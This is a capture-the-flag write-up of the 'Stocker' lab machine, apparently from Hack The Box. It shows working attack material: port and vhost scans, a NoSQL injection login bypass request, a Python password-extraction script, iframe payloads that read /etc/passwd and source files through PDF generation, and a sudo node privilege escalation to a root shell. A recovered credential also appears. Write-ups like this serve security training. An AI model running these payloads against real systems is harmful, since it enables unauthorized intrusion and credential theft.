
# Stocker write-up
_January 2023_

**Spoilers ahead!**

I started by checking what services were running in the target machine.
```
 ~ > nmap --version-intensity 0 -p-10000 10.10.11.196                                                                                     
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-26 15:02 WET
Nmap scan report for 10.10.11.196
Host is up (0.13s latency).
Not shown: 9998 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
```

After this, I added stocker.htb to the `etc/hosts` file, and accessed the website.
Since the website had nothing of interest on the page itself at first glance, I ran gobuster to check for both directories and subdomains.
With the following command, and using `subdomains-top1million-5000.txt` from [SecLists](https://github.com/danielmiessler/SecLists) I found another subdomain.

```bash
 ~ > gobuster vhost --append-domain --wordlist SecLists/Discovery/DNS/subdomains-top1million-5000.txt --url stocker.htb

===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:             http://stocker.htb
[+] Method:          GET
[+] Threads:         10
[+] Wordlist:        SecLists/Discovery/DNS/subdomains-top1million-5000.txt
[+] User Agent:      gobuster/3.4
[+] Timeout:         10s
[+] Append Domain:   true
===============================================================
2023/01/29 21:36:46 Starting gobuster in VHOST enumeration mode
===============================================================
Found: dev.stocker.htb Status: 302 [Size: 28] [--> /login]
Progress: 4987 / 4990 (99.94%)
===============================================================
2023/01/29 21:38:09 Finished
===============================================================
```
I went back to the `/etc/hosts` and added the `dev.stocker.htb` domain as well.

After checking for a few vulnerabilities I booted burp suite and started looking at the response packets.

After a few tries I was able to bypass the login using a No SQl Injection and using the name on stocker.htb, as follows (note that the content-type had to be changed to json for this to work).
```
POST /login HTTP/1.1
Host: dev.stocker.htb
Content-Length: 64
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://dev.stocker.htb
Content-Type: application/json
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://dev.stocker.htb/login
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: connect.sid=s%3A2sR9jmyk5byI-O0eMNdHsQMBrEUGLVV_.ed8LLKdQ%2BGbJtoDvQHIhwGXJdR5fbxkaejmi6N9USNs
Connection: close

{
	"username":"angoose",
	"password":{
		"$ne":"lalas"
	}
}
```
It would have been easier to bypass the login if I had noticed the `X-Powered-By: Express` line on the response packet. 
This is because I could have searched for this technology and quickly realise that there was a mongodb database running in the server. I eventually figured this out later.

Another way of logging in would be to find the user password. 
I did this since at some point in the challenge I didn't know how to proceed and thought the password might help me (it did not).

Thus, I adapted PayloadAllThings' NoSql script so that I could get the user password.
The script follows.
```python
import requests
import urllib3
import string
import urllib
urllib3.disable_warnings()

# later found that the password was b3e795719e2a644f69838a593dd159ac

username="angoose"
password=""
u="http://dev.stocker.htb/login"
headers={'content-type': 'application/json'}

while True:
    for c in string.printable:
        if c not in ['*','+','.','?','|']:
            payload='{"username": {"$eq": "%s"}, "password": {"$regex": "^%s" }}' % (username, password + c)
            r = requests.post(u, data = payload, headers = headers, verify = False, allow_redirects = False)
            print(c)

            if r.text == "Found. Redirecting to /stock" and r.status_code == 302:
                print(r.text)
                print("----->", c)
                password += c
                print(password)

```


Having bypassed the login I was now looking at a store page.

In the store one could select multiple items, and then by checking out a pdf would be sent from the server with an invoice.

If I changed some information on the sent request, such as the title of an item in the cart, the server would return an invoice with that name written.

After searching the web I found that in some cases the use of javascript frames could be helpful in these cases (pdf being generated with page content).
With this in mind, I ended up finding that changing the title of the item would allow me to access files within the server.
```
"title":"<iframe height=1000 width=1000 src=../../../../../../../etc/passwd></iframe>",
```

Knowing that there is a virtual host and the backend is using javascript, I tried the following.
```
"title":"<iframe height=1000 width=1000 src=../../../../../../../var/www/dev/index.js></iframe>",
```
The plaintext password in the file allowed me to login with ssh and get the user flag.
```bash
ssh angoose@stocker.htb
```

To get to the root flag I started by checking for interesting things using `id` and `sudo -l`, and got lucky with the second.
```
angoose@stocker:~$ sudo -l
Matching Defaults entries for angoose on stocker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User angoose may run the following commands on stocker:
    (ALL) /usr/bin/node /usr/local/scripts/*.js
```

Being able to run node as sudo allows one to escalate to root using the technique found in [GTFOBins](https://gtfobins.github.io/gtfobins/node/).
I began by creating a javascript file in the users home with the following.
```
const fs = require("child_process").spawn("/usr/bin/bash", {stdio: [0, 1, 2]})
```
Then, using directory transversal one can execute the file with node.
```bash
sudo /usr/bin/node /usr/local/scripts/../../../../home/angoose/oops.js
```
Finally, one can get the root flag as root.

